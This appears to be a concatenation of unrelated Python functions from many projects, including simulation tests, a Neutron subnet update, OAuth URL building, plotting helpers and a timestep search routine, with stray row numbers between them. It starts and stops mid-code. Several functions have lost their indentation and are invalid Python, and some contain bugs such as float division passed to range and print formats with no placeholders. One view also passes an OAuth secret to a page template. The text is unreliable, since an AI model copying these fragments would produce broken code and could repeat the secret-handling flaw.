        openff_interchange = Interchange.from_smirnoff(
            force_field=forcefield, topology=topology
        )
        openmm_system = openff_interchange.to_openmm(combine_nonbonded_forces=True)
        # Verify the single combined NonbondedForce got the expected method;
        # fail loudly if no NonbondedForce is present at all.
        for force in openmm_system.getForces():
            if isinstance(force, openmm.NonbondedForce):
                assert force.getNonbondedMethod() == nonbonded_method
                break
        else:
            raise Exception
    elif issubclass(result, (BaseException, Exception)):
        # The conversion itself is expected to fail with this exception type.
        exception = result
        with pytest.raises(exception):
            forcefield.get_parameter_handler("vdW", {}).method = vdw_method
            forcefield.get_parameter_handler(
                "Electrostatics", {}
            ).method = electrostatics_method
            openff_interchange = Interchange.from_smirnoff(
                force_field=forcefield, topology=topology
            )
            openff_interchange.to_openmm(combine_nonbonded_forces=True)
    else:
        # Guard against malformed test parameters.
        raise Exception("uh oh")
def register_cli_handler(instance, **options):
    """
    registers a new alembic cli handler or replaces the existing one
    if `replace=True` is provided. otherwise, it raises an error
    on adding a cli handler which is already registered.

    :param AlembicCLIHandlerBase instance: alembic cli handler to be registered.
                                           it must be an instance of
                                           AlembicCLIHandlerBase.

    :keyword bool replace: specifies that if there is another registered
                           cli handler with the same name, replace it
                           with the new one, otherwise raise an error.
                           defaults to False.

    :raises InvalidCLIHandlerTypeError: invalid cli handler type error.
    :raises DuplicatedCLIHandlerError: duplicated cli handler error.
    """
    # Delegate to the alembic package component's own registration logic.
    component = get_component(AlembicPackage.COMPONENT_NAME)
    component.register_cli_handler(instance, **options)
def read_point_cloud_file(file_path):
    """Read a bfpc dump and print its metadata and every received frame.

    This example stops once the dump has been read out completely.

    :param file_path: Path to dump file
    """
    stream = blickfeld_scanner.stream.point_cloud(from_file=file_path)  # Connect to the device
    # Print meta data of the dump (footer and header).
    print(stream.get_metadata())
    while not stream.end_of_stream():
        # Frame layout: protocol/blickfeld/data/frame.proto or doc/protocol.md;
        # protobuf API: https://developers.google.com/protocol-buffers/docs/pythontutorial
        frame = stream.recv_frame()
        print(f"Got {frame}")
def new_schema(name, public_name, is_active=True, **options):
    """
    Add a schema row to the Schema model and create the physical schema.

    :param name: unique internal schema name
    :param public_name: display name for the schema
    :param is_active: whether the schema starts active
    :param options: forwarded to create_schema()
    :raises Exception: if a schema with this name already exists
    :return: the saved Schema instance
    """
    try:
        schema = Schema(name=name, public_name=public_name, is_active=is_active)
        schema.save()
    except IntegrityError as err:
        # Chain the cause so the underlying constraint violation is not lost.
        raise Exception('Schema already exists.') from err
    create_schema(name, **options)
    return schema
def ROW(cell_reference):
    """Return the row number of the specified cell (not yet implemented)."""
    raise NotImplementedError()
def find_appropriate_timestep(simulation_factory,
equilibrium_samples,
M,
midpoint_operator,
temperature,
timestep_range,
DeltaF_neq_threshold=1.0,
max_samples=10000,
batch_size=1000,
verbose=True
):
"""Perform binary search* over the timestep range, trying to find
the maximum timestep that results in DeltaF_neq that doesn't exceed threshold
or have gross instability problems.
(*Not-quite-binary-search: instead of deterministic comparisons,
it performs hypothesis tests at regular intervals.)
Sketch
------
* Maintain an interval (min_timestep, max_timestep)
* At each iteration:
* timestep <- (min_timestep + max_timestep) / 2
* Only simulate long enough to be confident that DeltaF_neq(timestep) != threshold.
* If we're confident DeltaF_neq(timestep) > threshold, reduce max_timestep to current timestep.
* If we're confident DeltaF_neq(timestep) < threshold, increase min_timestep to current timestep
Parameters
----------
simulation_factory: function
accepts a timestep argument and returns a simulation equipped with an integrator with that
timestep
equilibrium_samples: list
list of samples from the configuration distribution at equilibrium
M: int
protocol length
midpoint_operator: function
accepts a simulation as an argument, doesn't return anything
temperature: unit'd quantity
temperature used to resample velocities
timestep_range: iterable
(min_timestep, max_timestep)
DeltaF_neq_threshold: double, default=1.0
maximum allowable DeltaF_neq
max_samples: int
number of samples
verbose: boolean
if True, print a bunch of stuff to the command prompt
Returns
-------
timestep: unit'd quantity
Maximum timestep tested that doesn't exceed the DeltaF_neq_threshold
"""
max_iter = 10
alpha = 1.96 # for now hard-coded confidence level
min_timestep, max_timestep = timestep_range[0], timestep_range[-1]
for i in range(max_iter):
timestep = (min_timestep + max_timestep) / 2
if verbose:
print("Current feasible range: [{:.3f}fs, {:.3f}fs]".format(
min_timestep.value_in_unit(unit.femtosecond),
max_timestep.value_in_unit(unit.femtosecond)
))
print("Testing: {:.3f}fs".format(timestep.value_in_unit(unit.femtosecond)))
simulation = simulation_factory(timestep)
simulation_crashed = False
changed_timestep_range = False
W_shads_F, W_shads_R, W_midpoints = [], [], []
def update_lists(W_shad_F, W_midpoint, W_shad_R):
W_shads_F.append(W_shad_F)
W_midpoints.append(W_midpoint)
W_shads_R.append(W_shad_R)
# collect up to max_samples protocol samples, making a decision about whether to proceed
# every batch_size samples
for _ in range(max_samples / batch_size):
# collect another batch_size protocol samples
for _ in range(batch_size):
# draw equilibrium sample
#x, v = equilibrium_sampler()
#simulation.context.setPositions(x)
#simulation.context.setVelocities(v)
simulation.context.setPositions(equilibrium_samples[np.random.randint(len(equilibrium_samples))])
simulation.context.setVelocitiesToTemperature(temperature)
# collect and store measurements
# if the simulation crashes, set simulation_crashed flag
try:
update_lists(*apply_protocol(simulation, M, midpoint_operator))
except:
simulation_crashed = True
if verbose: print("A simulation crashed! Considering this timestep unstable...")
# if we didn't crash, update estimate of DeltaF_neq upper and lower confidence bounds
DeltaF_neq, sq_uncertainty = estimate_nonequilibrium_free_energy(np.array(W_shads_F)[:,-1], np.array(W_shads_R)[:,-1])
if np.isnan(DeltaF_neq + sq_uncertainty):
if verbose:
print("A simulation encountered NaNs!")
simulation_crashed = True
bound = alpha * np.sqrt(sq_uncertainty)
DeltaF_neq_lcb, DeltaF_neq_ucb = DeltaF_neq - bound, DeltaF_neq + bound
out_of_bounds = (DeltaF_neq_lcb > DeltaF_neq_threshold) or (DeltaF_neq_ucb < DeltaF_neq_threshold)
if verbose and (out_of_bounds or simulation_crashed):
print("After collecting {} protocol samples, DeltaF_neq is likely in the following interval: "
"[{:.3f}, {:.3f}]".format(len(W_shads_F), DeltaF_neq_lcb, DeltaF_neq_ucb))
# if (DeltaF_neq_lcb > threshold) or (nans are encountered), then we're pretty sure this timestep is too big,
# and we can move on to try a smaller one
if simulation_crashed or (DeltaF_neq_lcb > DeltaF_neq_threshold):
if verbose:
print("This timestep is probably too big!\n")
max_timestep = timestep
changed_timestep_range = True
break
# else, if (DeltaF_neq_ucb < threshold), then we're pretty sure we can get
# away with a larger timestep
elif (DeltaF_neq_ucb < DeltaF_neq_threshold):
if verbose:
print("We can probably get away with a larger timestep!\n")
min_timestep = timestep
changed_timestep_range = True
break
# else, the threshold is within the upper and lower confidence bounds, and we keep going
if (not changed_timestep_range):
timestep = (min_timestep + max_timestep) / 2
if verbose:
print("\nTerminating early: found the following timestep: ".format(timestep.value_in_unit(unit.femtosecond)))
return timestep
if verbose:
timestep = (min_timestep + max_timestep) / 2
print("\nTerminating: found the following timestep: ".format(timestep.value_in_unit(unit.femtosecond)))
return timestep | 5,333,557 |
def critical_bands():
    """
    Return the critical bands of human hearing.

    Band edges and center frequencies follow Table 6.1 (p. 159) of
    "Psychoacoustics" by Zwicker and Fastl.

    Returns
    -------
    bands : numpy.ndarray, shape (24, 2)
        Lower and upper edge frequency (Hz) of each critical band.
    fc : list of int
        Center frequency (Hz) of each band.
    """
    # center frequencies (Hz)
    fc = [50, 150, 250, 350, 450, 570, 700, 840, 1000, 1170, 1370, 1600,
          1850, 2150, 2500, 2900, 3400, 4000, 4800, 5800, 7000, 8500,
          10500, 13500]
    # band edge frequencies (Hz): band i spans fb[i]..fb[i+1], centered on fc[i]
    fb = [0, 100, 200, 300, 400, 510, 630, 770, 920, 1080, 1270, 1480,
          1720, 2000, 2320, 2700, 3150, 3700, 4400, 5300, 6400, 7700,
          9500, 12000, 15500]
    # pair consecutive edges into [low, high] intervals
    bands = [[lo, hi] for lo, hi in zip(fb, fb[1:])]
    return np.array(bands), fc
def repackage(r, amo_id, amo_file, target_version=None, sdk_dir=None):
    """Pull amo_id/amo_file.xpi, schedule xpi creation, return hashtag
    """
    # a random tag identifies the downloadable XPI once the task finishes
    hashtag = get_random_string(10)
    # if (when?) choosing sdk_dir will be possible
    # sdk = SDK.objects.get(dir=sdk_dir) if sdk_dir else SDK.objects.all()[0]
    sdk_source_dir = SDK.objects.all()[0].get_source_dir()
    # schedule the repackage task; the caller then polls:
    #   /xpi/check_download/{hashtag}/
    # and finally downloads from:
    #   /xpi/download/{hashtag}/{desired_filename}/
    tasks.repackage.delay(
        amo_id, amo_file, sdk_source_dir, hashtag, target_version)
    # respond with the hashtag which will identify the downloadable xpi
    return HttpResponse('{"hashtag": "%s"}' % hashtag,
                        mimetype='application/json')
def execute_shifts(node):
    """
    Apply all shifts memorized by MOVESUBTREE in a single right-to-left
    pass over the children of *node* (Buchheim et al. tree layout).
    """
    accumulated_shift = 0
    accumulated_change = 0
    # walk the children right to left, accumulating the deferred shifts
    for child in reversed(node.children):
        child.prelim += accumulated_shift
        child.mod += accumulated_shift
        accumulated_change += child.change
        accumulated_shift += child.shift + accumulated_change
def save_group_df_lengths(df,
                          root_path:str):
    """Compute the number of unique posts per group, order descending and save.
    Args:
        df: pandas DataFrame with at least 'group_id' and 'id' columns
        root_path: path to the current directory
    Returns: saves a resource file of group ids and their lengths
    """
    lengths = (
        df.groupby("group_id")
        .agg({'id': 'nunique'})
        .reset_index()[["group_id", "id"]]
        .rename(columns={'id': 'length'})
        .sort_values("length", ascending=False)
    )
    # one row per group: group_id, length (unique post count), biggest first
    lengths.to_csv(f"{root_path}/res/group_lengths.csv", index=False)
def _click(event, x, y, flags, param):
    """
    Helper func.
    Record the pixel location of a click on an image and annotate the image
    with a color coded box. Green box: recorded as a "positive example",
    Blue box: recorded as a "negative example."
    Modified from:
    http://www.pyimagesearch.com/2015/03/09/capturing-mouse-click-events-with-python-and-opencv/
    """
    # grab references to the global variables
    global refPt, neg_refPt, positive_examples
    if event != cv2.EVENT_LBUTTONUP:
        return
    # record the click in the matching list and pick the box color (BGR):
    # green for positive examples, blue for negative ones
    if positive_examples:
        refPt.append((x, y))
        box_color = (0, 255, 0)
    else:
        neg_refPt.append((x, y))
        box_color = (255, 0, 0)
    # draw a rectangle centered on the click point and refresh the window
    top_left = (x - halfwin_side, y - halfwin_side)
    bottom_right = (x + halfwin_side, y + halfwin_side)
    cv2.rectangle(image, top_left, bottom_right, box_color, 2)
    cv2.imshow("image", image)
def edges_to_adj_list(edges):
    """
    Transform a set of edges into an adjacency list (dict of sets).
    For UNDIRECTED graphs: if v2 in adj_list[v1], then v1 in adj_list[v2].
    INPUT:
        - edges : a set or list of (v1, v2) edges
    OUTPUT:
        - adj_list: a dictionary with the vertices as keys, each mapped to
          the set of adjacent vertices.
    """
    adj_list = {}
    for v1, v2 in edges:
        # setdefault creates the neighbour set on first sight of a vertex
        adj_list.setdefault(v1, set()).add(v2)
        adj_list.setdefault(v2, set()).add(v1)
    return adj_list
def _get_lookups(
    name: str,
    project: interface.Project,
    base: Optional[str] = None) -> list[str]:
    """Build the ordered list of lookup keys for *name*.

    The list starts with *name* itself, then the design and/or kind that the
    project outline maps *name* to (when present), and finally *base* when
    one is supplied.

    Args:
        name (str): key to look up.
        project (interface.Project): project whose outline is consulted.
        base (Optional[str]): fallback key appended last.

    Returns:
        list[str]: ordered lookup keys.
    """
    lookups = [name]
    outline = project.outline
    # designs first, then kinds -- preserving the original priority order
    for mapping in (outline.designs, outline.kinds):
        if name in mapping:
            lookups.append(mapping[name])
    if base is not None:
        lookups.append(base)
    return lookups
def _assign_id(obj, seen_objs, obj_by_id, attr='_id', seen_obj=None):
"""Assign a unique ID to obj, and track all ids in obj_by_id."""
if seen_obj is None:
seen_obj = obj
if seen_obj not in seen_objs:
if not hasattr(obj, attr):
obj_by_id.append(obj)
setattr(obj, attr, len(obj_by_id))
seen_objs[seen_obj] = getattr(obj, attr)
else:
setattr(obj, attr, seen_objs[seen_obj]) | 5,333,565 |
def unwrap(value):
    """
    Unwrap the given Document or DocumentList as applicable.

    Documents become dicts, DocumentLists become lists; any other value is
    returned unchanged.
    """
    if isinstance(value, Document):
        return value.to_dict()
    if isinstance(value, DocumentList):
        return value.to_list()
    return value
def home_all():
    """Home page view.
    On this page a summary campaign manager view will shown with all campaigns.
    """
    # noinspection PyUnresolvedReferences
    return render_template(
        'index.html',
        oauth_consumer_key=OAUTH_CONSUMER_KEY,
        oauth_secret=OAUTH_SECRET,
        all=True,
        map_provider=map_provider(),
    )
def _sqrt(x):
"""_sqrt."""
isnumpy = isinstance(x, np.ndarray)
isscalar = np.isscalar(x)
return np.sqrt(x) if isnumpy else math.sqrt(x) if isscalar else x.sqrt() | 5,333,568 |
def cli_make_release_metadata(raw_metadata):
    """Make a data packet suitable for release.

    Reads the raw metadata CSV, cleans it, and writes the four resulting
    tables (release, control, duplicate metadata and duplicate map) to the
    current directory.
    """
    raw_meta = pd.read_csv(raw_metadata, dtype=str)
    # clean_metadata_table returns the four tables in this fixed order
    tables = clean_metadata_table(raw_meta)
    filenames = ('release_metadata.csv', 'control_metadata.csv',
                 'duplicate_metadata.csv', 'duplicate_map.csv')
    for table, filename in zip(tables, filenames):
        table.to_csv(filename)
def update_subnet(context, id, subnet):
    """Update values of a subnet.
    : param context: neutron api request context
    : param id: UUID representing the subnet to update.
    : param subnet: dictionary with keys indicating fields to update.
        valid keys are those that have a value of True for 'allow_put'
        as listed in the RESOURCE_ATTRIBUTE_MAP object in
        neutron/api/v2/attributes.py.
    """
    LOG.info("update_subnet %s for tenant %s" %
             (id, context.tenant_id))
    # all DB work happens inside one transaction
    with context.session.begin():
        subnet_db = db_api.subnet_find(context, id=id, scope=db_api.ONE)
        if not subnet_db:
            raise exceptions.SubnetNotFound(id=id)
        s = subnet["subnet"]
        # fields nobody may change via PUT, plus fields only admins may change
        always_pop = ["_cidr", "cidr", "first_ip", "last_ip", "ip_version",
                      "segment_id", "network_id"]
        admin_only = ["do_not_use", "created_at", "tenant_id",
                      "next_auto_assign_ip", "enable_dhcp"]
        utils.filter_body(context, s, admin_only, always_pop)
        # pull the nested attributes out of the request body; they are
        # handled separately from the plain column updates below
        dns_ips = utils.pop_param(s, "dns_nameservers", [])
        host_routes = utils.pop_param(s, "host_routes", [])
        gateway_ip = utils.pop_param(s, "gateway_ip", None)
        allocation_pools = utils.pop_param(s, "allocation_pools", None)
        if not CONF.QUARK.allow_allocation_pool_update:
            # pool updates disabled by config: reject any attempt, and build
            # the pools object from the subnet's existing IP policy instead
            if allocation_pools:
                raise exceptions.BadRequest(
                    resource="subnets",
                    msg="Allocation pools cannot be updated.")
            alloc_pools = allocation_pool.AllocationPools(
                subnet_db["cidr"],
                policies=models.IPPolicy.get_ip_policy_cidrs(subnet_db))
        else:
            alloc_pools = allocation_pool.AllocationPools(subnet_db["cidr"],
                                                          allocation_pools)
        if gateway_ip:
            # the gateway address must not fall inside an allocation pool
            alloc_pools.validate_gateway_excluded(gateway_ip)
        # look for an explicit default route (0.0.0.0/0) among host_routes
        default_route = None
        for route in host_routes:
            netaddr_route = netaddr.IPNetwork(route["destination"])
            if netaddr_route.value == routes.DEFAULT_ROUTE.value:
                default_route = route
                break
        if default_route is None:
            # no default route supplied: update (or create) the stored one
            # so its gateway matches the requested gateway_ip
            route_model = db_api.route_find(
                context, cidr=str(routes.DEFAULT_ROUTE), subnet_id=id,
                scope=db_api.ONE)
            if route_model:
                db_api.route_update(context, route_model,
                                    gateway=gateway_ip)
            else:
                db_api.route_create(context,
                                    cidr=str(routes.DEFAULT_ROUTE),
                                    gateway=gateway_ip, subnet_id=id)
        # DNS nameservers are replaced wholesale when any were supplied
        if dns_ips:
            subnet_db["dns_nameservers"] = []
        for dns_ip in dns_ips:
            subnet_db["dns_nameservers"].append(db_api.dns_create(
                context,
                ip=netaddr.IPAddress(dns_ip)))
        # host routes likewise replace the existing set when supplied
        if host_routes:
            subnet_db["routes"] = []
        for route in host_routes:
            subnet_db["routes"].append(db_api.route_create(
                context, cidr=route["destination"], gateway=route["nexthop"]))
        if CONF.QUARK.allow_allocation_pool_update:
            # a list (possibly empty) means the caller set the pools
            # explicitly; rebuild the subnet's IP policy to match
            if isinstance(allocation_pools, list):
                cidrs = alloc_pools.get_policy_cidrs()
                ip_policies.ensure_default_policy(cidrs, [subnet_db])
                subnet_db["ip_policy"] = db_api.ip_policy_update(
                    context, subnet_db["ip_policy"], exclude=cidrs)
        # apply the remaining plain column updates
        subnet = db_api.subnet_update(context, subnet_db, **s)
    return v._make_subnet_dict(subnet)
def run_system(
        main: Callable,
        args: Optional[Tuple] = None,
        kwargs: Optional[Dict] = None,
        requirements: Optional[List[str]] = None,
        startup: Optional[Callable] = None,
        cleanup: Optional[Callable] = None,
        keyboard_interrupt: Optional[Callable] = None,
        sys_exit: Optional[Callable] = None,
        restart_when_error: bool = False,
        error_log: Optional[Union[str, Path]] = None
) -> None:
    """
    Run the system.
    :param main: the main function of the system.
    :param args: the arguments for the main function.
    :param kwargs: the keyword arguments for the main function.
    :param requirements: the requirements of this system.
        When the ImportError or ModuleNotFoundError occurred,
        system will try install the requirements use pip command, and try import module again.
    :param startup: this function will be called before the main function.
    :param cleanup: the function will be called when the process exits.
    :param keyboard_interrupt: this function will be called when the KeyboardInterrupt occurred.
    :param sys_exit: this function will be called when the SystemExit occurred.
    :param restart_when_error: when some error occurred, try restart the main function.
    :param error_log: when the unknown error occurred. try save the error log to this file.
    """
    def __run_main(args_, kwargs_):
        # dispatch on which of args/kwargs the caller actually supplied
        if args_ is not None and kwargs_ is not None:
            main(*args_, **kwargs_)
        elif args_ is not None:
            main(*args_)
        elif kwargs_ is not None:
            main(**kwargs_)
        else:
            main()
    try:
        # startup
        if startup is not None:
            startup()
        # main
        __run_main(args, kwargs)
        # add cleanup signal handler so SIGTERM still triggers cleanup
        if cleanup is not None:
            def sig_handler(signum, frame) -> None:
                cleanup()
                exit(1)
            signal(SIGTERM, sig_handler)
    except (ImportError, ModuleNotFoundError):
        if requirements is not None:
            install_modules(requirements)
        # try restart system.
        # FIX: propagate error_log; the original dropped it here, losing the
        # error-log destination after a dependency-install restart.
        run_system(main, args, kwargs, requirements, startup, cleanup,
                   keyboard_interrupt, sys_exit, restart_when_error, error_log)
    except KeyboardInterrupt:
        if keyboard_interrupt is not None:
            keyboard_interrupt()
    except SystemExit:
        if sys_exit is not None:
            sys_exit()
    except Exception as error:
        # if unknown error occurred and the `restart_when_error` is True. Try restart the system.
        print(f'Some unknown error occurred. Try restart. <Exception: {error}>')
        print_exc()
        if error_log is not None:
            try:
                with open(str(error_log), mode='w', encoding=ENCODING) as f:
                    f.write(format_exc())
            except Exception as e:
                print(f"Can't save the error log to file. <Exception: {e}>")
                print_exc()
        if restart_when_error:
            # FIX: propagate error_log on restart as well (was dropped).
            run_system(
                main, args, kwargs, requirements, startup, cleanup,
                keyboard_interrupt, sys_exit, restart_when_error, error_log
            )
    finally:
        # cleanup: ignore further signals while cleanup runs, then restore
        # the default handlers
        if cleanup is not None:
            signal(SIGTERM, SIG_IGN)
            signal(SIGINT, SIG_IGN)
            cleanup()
            signal(SIGTERM, SIG_DFL)
            signal(SIGINT, SIG_DFL)
def validate_params():
    """Validate that all required ROS parameters exist and have the expected type.

    @rtype bool
    """
    def validate_single_param(param_name, required_type):
        """Check a single parameter; *required_type* may be one type or a
        non-empty list of acceptable types.

        @rtype bool
        """
        if not rospy.has_param(param_name):
            rospy.logfatal('Parameter {} is not defined but needed'.format(param_name))
            return False
        value_type = type(rospy.get_param(param_name))
        if isinstance(required_type, list) and len(required_type) > 0:
            # FIX: the original condition was inverted -- it logged fatal and
            # failed when the value's type WAS in the accepted list.
            if value_type not in required_type:
                rospy.logfatal('Parameter {} is not any of type {}'.format(param_name, required_type))
                return False
        elif value_type is not required_type:
            rospy.logfatal('Parameter {} is not of type {}'.format(param_name, required_type))
            return False
        return True
    # 'result and ...' short-circuits, so validation stops at the first
    # failing parameter (behavior kept from the original).
    result = True
    result = result and validate_single_param('~update_frequency', int)
    result = result and validate_single_param('~do_cpu', bool)
    result = result and validate_single_param('~do_memory', bool)
    result = result and validate_single_param('~do_network', bool)
    return result
def run_test_general_base_retrieval_methods(query_dic, query_types, trec_cast_eval, similarity, string_params,
                                            searcher: SimpleSearcher, reranker,
                                            write_to_trec_eval, write_results_to_file, reranker_query_config,
                                            reranking_threshold, use_rrf):
    """
    Run topics in trec_cast_eval
    query_dic is a dict with string keys and a QueryConfig object
    query_types is a list of strings that denote keys we want to use that are in query_dic
    trec_cast_eval - object of type ConvSearchEvaluationGeneral
    If write_to_trec_eval writes the results in trec eval format
    If write_results_to_file writes the results in tsv format (including the
    query and document's content for later use)
    Returns (metric_results, doc_results): two dicts keyed by the same
    "<similarity>_<query_type>_<string_params>" run key.
    """
    metric_results = {}
    doc_results = {}
    for query_type in query_types:
        print(similarity + " " + query_type + " " + string_params)
        # run key uniquely identifying this (similarity, query type, params) combo
        current_key = similarity + "_" + query_type + "_" + string_params
        metric_results[current_key], _, doc_results[current_key] = \
            run_topics_general(trec_cast_eval=trec_cast_eval,
                               query_config=query_dic[query_type], searcher=searcher,
                               reranker=reranker,
                               reranker_query_config=reranker_query_config,
                               reranking_threshold=reranking_threshold,
                               use_rrf=use_rrf)
        # derive output file name from the index directory name plus the run key;
        # suffixes record whether RM3 expansion and/or a reranker were used
        index_name = os.path.basename(os.path.normpath(searcher.index_dir))
        run_file_name = index_name + "_" + current_key
        run_name = query_type
        if searcher.is_using_rm3():
            run_file_name += "_rm3"
        if reranker:
            run_file_name += "_" + reranker.RERANKER_TYPE + "_" + str(reranking_threshold)
            run_name += "_" + reranker.RERANKER_TYPE + "_" + str(reranking_threshold)
        if write_to_trec_eval:
            write_trec_results(file_name=run_file_name, result=doc_results[current_key],
                               run_name=run_name)
        if write_results_to_file:
            write_doc_results_to_file(file_name=run_file_name + ".tsv", result=doc_results[current_key])
    return metric_results, doc_results
def user_exists(username):
    """Return True if the username exists, or False if it doesn't."""
    try:
        # constructing the API object raises for unknown users
        adobe_api.AdobeAPIObject(username)
        return True
    except adobe_api.AdobeAPINoUserException:
        return False
def bags_containing_bag(bag: str, rules: dict[str, list]) -> set[str]:
    """Return the set of bag colors whose rules mention *bag*.

    FIX: the return annotation claimed ``int``, but a set comprehension is
    produced; the annotation now matches the actual return type.

    :param bag: bag color to search for.
    :param rules: mapping of bag color -> list of (count, color) rule pairs.
    :return: set of bag colors that can directly contain *bag*.

    NOTE(review): ``bag in r_color`` is a substring test on strings, so
    e.g. "gold" also matches "shiny gold" -- kept as-is, confirm intended.
    """
    return {r_bag
            for r_bag, r_rule in rules.items()
            for _, r_color in r_rule
            if bag in r_color}
def default_mutable_arguments():
    """Explore default mutable arguments, which are a dangerous game in themselves.
    Why do mutable default arguments suffer from this apparent problem? A function's
    default values are evaluated at the point of function definition in the defining
    scope. In particular, we can examine these bindings by printing
    append_twice.__defaults__ after append_twice has been defined. For this function,
    we have
    print(append_twice.__defaults__) # ([],)
    If a binding for `lst` is not supplied, then the `lst` name inside append_twice
    falls back to the array object that lives inside append_twice.__defaults__.
    In particular, if we update `lst` in place during one function call, we have changed
    the value of the default argument. That is,
    print(append_twice.__defaults__) # ([], )
    append_twice(1)
    print(append_twice.__defaults__) # ([1, 1], )
    append_twice(2)
    print(append_twice.__defaults__) # ([1, 1, 2, 2], )
    In each case where a user-supplied binding for `lst is not given, we modify the
    single (mutable) default value, which leads to this crazy behavior.
    """
    # NOTE: `lst=[]` is intentionally a mutable default -- this whole block
    # exists to demonstrate that the default list is created once at
    # definition time and shared across calls.
    def append_twice(a, lst=[]):
        """Append a value to a list twice."""
        lst.append(a)
        lst.append(a)
        return lst
    # explicit `lst` argument: the shared default object is untouched
    print(append_twice(1, lst=[4])) # => [4, 1, 1]
    print(append_twice(11, lst=[2, 3, 5, 7])) # => [2, 3, 5, 7, 11, 11]
    # `lst` omitted: every call mutates the single shared default list
    print(append_twice(1)) # => [1, 1]
    print(append_twice(2)) # => [1, 1, 2, 2]
    print(append_twice(3))
def is_text_file(file_):
    """
    detect if file is of type text
    :param file_: file to be tested
    :returns: `bool` of whether the file is text
    """
    # only the first 1 KiB is sampled to classify the file
    with open(file_, 'rb') as handle:
        head = handle.read(1024)
    return not is_binary_string(head)
def soft_update_datetime_field(
    model_inst: models.Model,
    field_name: str,
    warehouse_field_value: Union[datetime, None],
) -> List[str]:
    """
    Uses Django ORM to update DateTime field of model instance if the field value is null and the warehouse data is non-null.
    """
    model_name: str = model_inst.__class__.__name__
    # Never overwrite a value already set by a previous cron run or an admin
    if getattr(model_inst, field_name) is not None:
        logger.info(
            f'Skipped update of {field_name} for {model_name} instance ({model_inst.id}); existing value was found')
        return []
    if not warehouse_field_value:
        return []
    # warehouse timestamps are stored naive; mark them as UTC before saving
    setattr(model_inst, field_name,
            warehouse_field_value.replace(tzinfo=pytz.UTC))
    logger.info(f'Updated {field_name} for {model_name} instance ({model_inst.id})')
    return [field_name]
def plot_confusion_matrix(
    y_true,
    y_pred,
    normalize=False,
    cmap=plt.cm.Blues,
    label_list = None,
    visible=True,
    savepath=None):
    """
    Plot (and optionally save) the confusion matrix for a set of predictions.
    Normalization can be applied by setting `normalize=True`.

    :param y_true: ground-truth integer labels.
    :param y_pred: predicted integer labels.
    :param normalize: if True, normalize each row of the matrix.
    :param cmap: matplotlib colormap used by imshow.
    :param label_list: optional tick labels; defaults to 0..max(y_true).
    :param visible: if True, call plt.show().
    :param savepath: if given, save the figure to this path.
    :returns: (acc, f1) overall accuracy and micro-averaged F1 score.
    """
    cm = confusion_matrix(y_true, y_pred)
    acc = accuracy_score(y_true, y_pred)
    f1 = f1_score(y_true, y_pred, average="micro")
    title = f"Confusion Matrix, Acc: {acc:.2f}, F1: {f1:.2f}"
    if label_list is None:
        # FIX: use `is None` (not `== None`); include the top label --
        # labels 0..max(y_true) need max(y_true)+1 entries so the number of
        # ticks matches the confusion-matrix dimension.
        classes = range(0, max(y_true) + 1)
    else:
        classes = label_list
    if normalize:
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        print("Normalized confusion matrix")
    else:
        print('Confusion matrix, without normalization')
    plt.figure(figsize=(13,13))
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    tick_marks = np.arange(len(classes))
    plt.xticks(tick_marks, classes, rotation=45)
    plt.yticks(tick_marks, classes)
    fmt = '.2f' if normalize else 'd'
    # annotate each cell; flip text color on dark cells for readability
    thresh = cm.max() / 2.
    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(j, i, format(cm[i, j], fmt),
                 horizontalalignment="center",
                 color="white" if cm[i, j] > thresh else "black")
    plt.tight_layout()
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
    if savepath is not None:
        plt.savefig(savepath)
    if visible:
        plt.show()
    return acc, f1
def test_budget_get_nonexistent(base_data, client):
    """The status code is 404 when the budget does not exist"""
    _, token, _ = base_data
    headers = {'Authorization': f'bearer {token}'}
    response = client.get(
        '/budgets/22968743-5e64-481d-a5d7-8cb46df035e5', headers=headers)
    assert response.status_code == 404
def _test_pressure_reconstruction(self, g, recon_p, point_val, point_coo):
    """
    Testing pressure reconstruction.

    Evaluates the reconstructed P1 pressure polynomial at the Lagrangian
    nodes and checks the values against ``point_val``.
    Parameters
    ----------
    g : PorePy object
        Grid.
    recon_p : NumPy nd-Array
        Reconstructed pressure polynomial.
    point_val : NumPy nd-Array
        Pressure values at the Lagrangian nodes.
    point_coo : NumPy array
        Coordinates at the Lagrangian nodes.
    Returns
    -------
    None.
    """
    evaluated = utils.eval_P1(recon_p, point_coo)
    np.testing.assert_allclose(
        evaluated,
        point_val,
        rtol=1e-6,
        atol=1e-3,
        err_msg="Pressure reconstruction has failed"
    )
    return None
def main():
    """Entry point: generate five recipes."""
    generate_recipes(5)
def logout():
    """Log out the current user and redirect to the index page."""
    logout_user()
    target = url_for('index')
    return redirect(target)
def get_authorization_url(
    app_id, redirect_uri, scope='all', state='', extra_data='', **params):
    """
    Build the URL for the first leg of the OAuth flow.

    Refer to `Authentication Docs <https://developers.kloudless.com/docs/latest/
    authentication#oauth-2.0>`_ for more information.

    :param str app_id: Application ID
    :param str redirect_uri: Redirect URI to your application server
    :param str scope: A space-delimited string of scopes that indicate which
        services a user can connect, and which permissions to request
    :param str state: An arbitrary string redirected back via ``redirect_uri``
        as a query parameter; a random url-safe Base64 string is generated
        when empty
    :param str extra_data: A URL-encoded JSON object (or dict) pre-filling
        default values in the Kloudless authentication forms
    :param params: Additional query parameters
    :returns: `tuple(url, state)`: redirect the user to ``url``; save
        ``state`` in the user's session for future validation
    :rtype: `tuple(str, str)`
    """
    # accept a dict and serialize it for the caller's convenience
    if extra_data and isinstance(extra_data, dict):
        extra_data = json.dumps(extra_data)
    # generate a random url-safe CSRF state token when none was supplied
    if not state:
        state = base64.urlsafe_b64encode(os.urandom(12)).decode('utf8')
    params.update(
        client_id=app_id,
        response_type='code',
        redirect_uri=redirect_uri,
        scope=scope,
        state=state,
        extra_data=extra_data,
    )
    endpoint = construct_kloudless_endpoint('oauth',
                                            api_version=OAUTH_API_VERSION)
    url = requests.Request('GET', endpoint, params=params).prepare().url
    return url, state
def poolmanager_get_pool_group(args):
    """
    Get information about a poolgroup. Requires admin role.
    """
    LOGGER.debug('args: %s' % str(args))
    # every attribute of the parsed args namespace is forwarded as a kwarg
    with get_client(args) as dcache:
        print_response(dcache.poolmanager.get_pool_group(**vars(args)))
def runMultiQueryBatch(scenario, queries, xmldb='', queryPath=None, outputDir=None,
                       miLogFile=None, regions=None, regionMap=None, rewriteParser=None,
